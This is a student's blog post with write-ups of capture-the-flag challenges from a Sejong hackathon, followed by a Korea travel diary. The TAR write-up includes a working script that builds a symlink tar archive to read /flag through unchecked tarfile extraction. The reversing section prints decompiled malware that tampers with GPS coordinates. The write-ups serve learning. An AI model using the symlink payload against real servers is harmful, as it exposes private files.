Hackathon Sejong & Korea Trip

Welcome! This blog covers the technical writeups of the challenges we solved during the competition, followed by a photo diary of my memorable trip to South Korea.

My journey began at Tan Son Nhat (SGN) to Incheon (ICN) on a flight lasting approximately 5 hours. We flew with Vietjet Air, an airline notorious for delays but popular for its budget-friendly fares compared to other carriers. We were quite lucky, the flight was only delayed by 30 minutes

The food on Vietjet is very familiar. I had spaghetti with tomato sauce and cashews for dessert

During the flight, I reviewed the timeline, mentally preparing myself for what was coming

As soon as we got off the plane, we just followed the signs to get to immigration. I have to say, Incheon Airport is absolutely massive and super modern, but you really can’t get lost, there are arrows pointing you everywhere.

Just a heads-up regarding immigration: It can be pretty strict. You have to fill out an arrival card with details like where you’re staying, your purpose of visit, how long you’ll be there….

Do yourself a favor and fill this form out while you’re still on the plane. Trust me, you do not want to be standing there filling out paperwork while the line gets longer!

Taxi Grab in Korea are expensive, so the subway and bus are the way to go. We decided to bought a T-Money card right away so we wouldn’t have to deal with buying single tickets every time we moved.

• The card itself is 4000 KRW, can find them at any convenience store like GS25, CU, etc or even right there at the airport vending machines.
• Sim card i bought it in VietNam to save money

Okay, you bought the card, now how do you put money on it?

If you buy these cards at convenience stores, you can ask the staff to top up your account directly after purchasing the card. Otherwise, you have to find “Ticket Vending and Card Reload” machines at every subway station (It have an English language button)

Here’s a quick breakdown of the machine layout so you don’t look confused like I did at first:

• The Red Slot (Left): This is where you place your card. Once you put it there, the screen will pop up showing your current balance and ask how much you want to add.
• The Yellow Slot (Middle): This is for coins money
• The Black Slot (Right): This is for paper money

When place your card in the Red spot. You can select the amount on the screen (Minimum: 1,000 KRW) and insert your cash into the corresponding slot.

Just like vending machines, these machines are super picky about the quality of your bills. Make sure your cash is crisp and flat. If your bill is wrinkled or old, the machine will spit it back out at you repeatedly. Save yourself the awkwardness and smooth out your money before feeding it in 😅

~ 2,3 days

Writeup of Competition

Here are the detailed solutions Forensic & Reverse challenges, i solved during the competition.

Shadow Of The System

Analyze the provided SYSTEM registry hive to find the flag

This revealed that it was a Windows Registry File. To analyze it properly, I decided to use Registry Viewer, a tool designed for exploring Windows registry files.

Since registry files typically contain huge amounts of keys and directories, manually browsing through them would have been inefficient.

I recalled that the challenge hinted at “backdoor” activity, so I used the search function (Ctrl + F) in Registry Viewer and searched for the keyword “backdoor”.

Surprisingly, this immediately led me to a suspicious service entry.

You can use method 2:

utilized RegRipper3.0 (available on GitHub) to analyze the SYSTEM file. I exported the results to a text file named SYSTEM_full_output.txt

Inside the output file, I performed a text search for suspicious keywords such as services, cmd.exe, and powershell.exe

Upon filtering through the results, I located the flag hidden within a service entry.

FLAG: FLAG{8yp455_u4c_g37_5y5t3m}

Watch

The challenge specifies that we had to retrieve the string that was written in Notepad during an RDP session. Provided by the challenge are two files: Cache0000.bin and bcache24.bmc. These files are related to RDP cache storage.

I used bmc-tools to extract and reconstruct RDP cache images. After cloning the repository, I ran the script to extract the bitmap images from the provided cache file.

After extracting the images, I manually scrolled through the output folder. I eventually found a screenshot of a Notepad window containing the flag.

FLAG: FLAG{s0m3on3_1s_w4tch1n9_my_pc}

Hidden Message

The challenge provided an image called Hidden Message.png. At first glance, nothing unusual stood out visually. Since the challenge mentioned something “hidden,” I suspected steganography

I analyzed the provided image using zsteg. The analysis revealed that there was another PNG file hidden in the b1,rgb,lsb,xy channel.

I extracted the hidden PNG file using the following payload:

Opening the extracted image revealed the flag:

FLAG: FLAG{St3gan09raphy_15_Eazy~~!!}

Nothing Is Essential

Analyze a disk image to find a meeting time.

We were given a .ad1 image file. I opened it in FTK Imager to analyze the file structure. After browsing through the directories, the AppData folder seemed to contain the most relevant user data. I dug deeper and found a message in Notepad++ metadata:

I initially suspected this file might contain the meeting date, but it only revealed a time fragment ending at 5:??. This led me to explore other text-based applications.

While investigating the OneNote folder, I discovered two SQLite3 database files that seemed promising for storing notes and schedules. I extracted both for further analysis.

I opened the .db files in a text editor (or SQLite Browser) and searched for keywords like meeting, date, time, and schedule. Finally, searching for the keyword “meet” in notes.sdk_b193c846-2e04-40da-a8ed-1628569cfbd9.db revealed the flag.

FLAG: FLAG{2025/03/14_17:40}

I Love Reversing

Analyze the infect.exe malware.

1. Static Analysis: I ran DiEC (Detect It Easy) on infect.exe.

The output confirmed the binary was compiled with Python and packed using PyInstaller.

1. Extraction: To reverse engineer it, I used pyinstxtractor (available here) to extract the contents.

This generated a directory named infect.exe_extracted containing infect.pyc.

1. Decompilation: I uploaded infect.pyc to PyLingual (an online Python decompiler) to reconstruct the source code.

Decompiled Source Code:

import requests
from flask import Flask, request, jsonify

app = Flask(__name__)

def infect(location_data):
    location_data['latitude'] += 2.
    location_data['longitude'] += 2.
    return location_data

@app.route('/location_data', methods=['POST'])
def location_data():
    location_data = request.json
    print('Received data from attack instruction PC:', location_data)
    location_data = infect(location_data)
    url = '<http://192.168.101.101:4653/location_data>'
    response = requests.post(url, json=location_data)
    print('Response from ship node:', response.text)
    return jsonify({'message': 'Data forwarded to ship node successfully!'})

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=4653)

Analysis: The script runs a Flask web server acting as malware. It accepts JSON payloads via POST requests. The infect function modifies the input data by adding values to the GPS coordinates. Based on the challenge context, the specific value added was 2.593627.

FLAG: FLAG{2.593627}

TAR

Exploiting tarfile handling in Python.

Vuln Analysis: The challenge provided a tar.py source code which allows users to upload a Base64 encoded tar file. The script extracts the file without checking for symbolic links (symlinks).

The vulnerable code section:

with tarfile.open(fileobj=tar_bytes, mode='r') as tar:
    tar.extractall(path=extract_dir_path)

tar.extractall is vulnerable because it blindly trusts paths in the tar archive. We can exploit this by creating a symlink in the tar file that points to the /flag file on the server.

Exploit Script: I wrote a Python script to generate the malicious payload:

import tarfile
import base64
import os

# Create a symlink pointing to the flag
os.symlink('/flag', 'flag_link')

# Add the symlink to a tar file
with tarfile.open('exploit.tar', 'w') as tar:
    tar.add('flag_link')

# Read and encode the tar file to Base64
with open('exploit.tar', 'rb') as f:
    encoded = base64.b64encode(f.read()).decode()

print(encoded)

I ran the script, obtained the Base64 string, and pasted it into the challenge’s netcat session.

FLAG: FLAG{53f81c237b8466628a65ed9a0999aff8}

Barcode

Reverse an ASCII art generator to find the input hex.

I started by analyzing the binary in IDA Pro.

The binary generates an ASCII pattern based on a hexadecimal input. The flag is flag.barcode. The goal is to reverse the generation process to recover the original hex input.

Function Logic:

• sub_18F0 (Bit to ASCII): Converts a 64-bit integer into an 8x8 binary pattern.
• sub_2650 (Matrix Transpose): Transposes the 8x8 bit matrix (rows become columns).
• sub_2850 (Pattern Printing): Prints the matrix: 0 becomes a space, non-zero becomes .
• sub_12E0 (Hex Processing): Parses the input hex string.

Solver Script: I wrote a Python script to reverse the bit manipulation and XOR operations:

def matrix_to_hex(matrix_lines):
    if len(matrix_lines) != 8:
        raise ValueError("Need 8 rows.")

    binary_str = ""
    for row in matrix_lines[::-1]:  # x-axis flip (vertical)
        # Add y-axis flip by reversing each row
        flipped_row = row[::-1].ljust(8)
        binary_row = ''.join(['1' if c == '*' else '0' for c in flipped_row])
        binary_str += binary_row
    return int(binary_str, 2)

def calculate_inputs(output_values):
    inputs = []
    cumulative_xor = 0
    for i, out in enumerate(output_values):
        if i == 0:
            inputs.append(out)
            cumulative_xor = out
        elif i == 1:
            inputs.append(~out ^ cumulative_xor)
            cumulative_xor ^= out
        else:
            inputs.append(out ^ cumulative_xor)
            cumulative_xor ^= ~out
    return inputs

# The ASCII art blocks from the flag.barcode file
blocks = [
    [ # Block 1
        "        ", " ****** ", " *    * ", " ****** ", " *    * ", " *    * ", " *    * ", "        ",
    ],
    [ # Block 2
        "        ", " *    * ", " *    * ", " *    * ", " *    * ", " *    * ", " ****** ", "        ",
    ],
    [ # Block 3
        "        ", "  ****  ", " *    * ", " ****** ", " *    * ", " *    * ", " *    * ", "        ",
    ],
    [ # Block 4
        "        ", "  ****  ", " *    * ", " *      ", " * ***  ", " *    * ", "  ****  ", "        ",
    ]
]

output_values = [matrix_to_hex(block) for block in blocks]
input_values = calculate_inputs(output_values)
combined_hex = ''.join(f"{x & 0xFFFFFFFFFFFFFFFF:016x}" for x in input_values)

print(f"Final input hex string: 0x{combined_hex}")

Running the script gave us the final flag.

FLAG: FLAG{0x000202027e027e00ff83ffff83ff83ff003e424202424000fffdffcfffff83ff}

Competition View

Banner

I went into the competition feeling relax..

After spending two days in competition, I stayed in South Korea for two more days to go to Seoul & do some sightseeing 😁

Korea Trip 🇰🇷

The Korean organizers were incredibly helpful, providing all the necessary documents for our visa applications, which made the process much smoother. We managed to finalize all the paperwork just in the nick of time, ready to pack our bags and head to Sejong.

Nice to CU

The convenience store that seems to be absolutely everywhere here is Nice to CU. Honestly, stepping inside felt pretty familiar, the vibes is almost identical to the GS25 in Vietnam

They stock some unique and quirky items that caught my eye

I like soju but it’s strong, so it’s better to drink it with sweet drinks… you can see right 🤫😂

I tried the famous Banana Milk since everyone says it’s a total “must-try” when in Korea. I took my friend’s advice and tried mixing banana milk with Americano… and wow, it tasted really good!!

Let me tell you… I got hooked immediately, it was so good that I actually ran back out late at night just to grab another 🤣

Myeongdong Night Market

This is one of the busiest and most famous districts in Seoul [Location] It’s a stretch of about 500m that perfectly blends the super modern, bustling city vibe with that traditional Korean charm, the street food and specific dishes you tried like lobsters, egg bread, etc.)

Walking through here feels like entering a maze of skincare and cosmetics, there are literally hundreds of shops! Whether you’re hunting for affordable fashion, high-end brands, K-Pop merch…

Additionally, Myeongdong is well-known for its diverse street food, including spicy rice cakes (teokbokki), Korean fried chicken, and fish-shaped pastries (bungeoppang)

The energy here is just unmatched. It’s always packed and lively, often with random street performances happening right in front of you. What I loved most were the people, especially the food stall owners. You can really feel their passion and sincerity, which creates such a vibrant and colorful atmosphere that makes you want to stay forever.

The district also houses major shopping malls and duty-free stores, attracting millions of visitors each year. Moreover, Myeongdong Cathedral, a significant historical site, is also located in this area.

I finished with a fantastic glass of lemonade at the end of the road.

Starfield Coex Mall

As a massive book lover, there was no way I was leaving Seoul without visiting the most famous library in the country is Starfield Library, located right inside the COEX Mall.

And wow… “huge” doesn’t even begin to cover it. It is absolutely majestic. I stood there completely awestruck, my jaw practically hit the floor! Apparently, there are over 50,000 books and magazines here, all neatly stacked on these insane shelves that tower up to 13 meters high.

You can just grab any book you want and start reading, no librarians, no checkout counters, it’s all based on the honor system. I saw tons of young locals actually studying and reading there. As for us tourists? Well, since most of the books are in Korean, we were mostly there for the Gram and to soak in the vibes (let’s be real, I can’t read a word of it anyway)

Since it was super crowded, I mainly focused on getting those iconic check-in shots.

P/s: If you do want to read but don’t know Korean, the library actually provides iPads! You can use them to translate content or read e-books in your preferred language.

Gyeongbokgung

Next up, we headed to Gwanghwamun Gate. Even though it has been rebuilt multiple times over the centuries, it stands tall today as an absolute icon of Seoul.

Construction began in 1395, at the beginning of the Joseon dynasty. The gate quickly became one of the most important gates, as it protected the main palace. This main gate also holds a rich history; during the Japanese invasion of 1592, it was destroyed by fire and left abandoned for over 250 years. After being rebuilt in 1867, its wooden structure was again destroyed during the Korean War, and the stone foundation was left unfinished.

You should try to time your visit perfectly to see the Royal Changing of the Guard. It’s definitely worth checking the schedule beforehand because it’s a truly spectacular sight! I couldn’t make it because I was running late.

The complex is massive with so many different sections. I haven’t dug too deep into the history books, but one thing that stood out was the giant statue of King Sejong right in the middle of the square. I learned that he’s a legendary figure from the Joseon Dynasty, basically the “Great King” who invented Hangul (the Korean alphabet we see everywhere today)

The ticket costs 3000 KRW, but if you wear a Hanbok (traditional Korean clothing), you get in for free. Anyway, renting a hanbok is more expensive than the entrance fee

T1 Base Camp

If you are a LoLs fan, specifically a T1 or Faker fan, this place is essentially holy ground. Located just a short walk from Hongdae Station

Seoul’s subway system is huge (9 main lines) and can honestly be a bit overwhelming at first glance.

• To get to T1 Basecamp smoothly, just hop on Line 2. It’s the Green Line on the map.
• Definitely have an updated subway map or a reliable app handy to check the schedule.

T1 Basecamp is a massive 854-square-meter PC Bang completely decked out in T1’s signature colors: Red, White, and Black

The whole vibe screams “Faker” and T1 legacy. You’ll see huge portraits of the top pro players along with their names plastered all around the venue.

Apparently, T1 teamed up with SuperPlay - a local Korean gaming lifestyle brand to design this entire space, and they did an incredible job creating a unique experience that’s way more than just a place to play games

Street & Food

I just want to drop a few random photos I took while walking around. Here are a few of my random favorite street corners:

streets

rainbow

souvenir shop

streets in alleys

photobooth

Honestly, you don’t even need to go to famous tourist spots to find beauty here. Just wandering down a random street feels like being in a movie scene. Everything is super clean, organized, and has this really peaceful, cinematic vibes..

streets at night

Of course, with a “foodie soul” like mine, there is no way I could finish this blog without talking about the food! 🤤 My impression of Korean food is that it’s quite spicy and bland (probably because I’m used to Vietnamese food)

The traditional spicy rice cakes paired with fried chicken are a match made in heaven

A raw food restaurant that we chose based on a friend’s recommendation… it’s good

We went to a local BBQ spot and the owner was incredibly friendly. The moment he found out we were from Vietnam, he actually gifted us an extra serving of meat on the house! He was so adorable ❤️

‘Nice to meat you” =)))))

On our very last night, a close hyung of mine who lives in Korea invited me out for a special dinner. We had a massive Seafood feast accompanied by traditional Makgeolli (rice wine).

Honestly, for a student like me, this was a truly luxurious experience. It was the perfect way to end the trip. Thank you so much for the warm welcome and this amazing treat!

Can u see VietNam food? I’m starting to feel homesick

I feel lucky that I didn’t get into any fights or encounter any difficult people, everything went smoothly ^^

The End

This was truly an unforgettable experience during my university years. I want to sincerely thank my parents for their support and for giving me the opportunity to join this competition – an amazing journey that helped me learn, experience a new culture, and grow as a person.

I’m also incredibly grateful to my wonderful teammates and to the Hackathon Sejong organizers for making everything run smoothly and creating such memorable moments.

This trip was especially meaningful because I finally got to meet friends and brothers I’d only known online before not in Vietnam it’s Korea, which made it even more special. I was particularly impressed by Korea’s beautiful scenery, rich culture, and historical landmarks. The local food was delicious, and I felt genuinely welcomed by the people there, which left a lasting impression on me.

I truly fell in love with Korea and hope to return one day to reconnect with all the amazing people I met on this journey. 감사합니다 🇰🇷 , 또 만나요 !

Thank you for taking the time to read my blog and for joining me on this memorable adventure❤️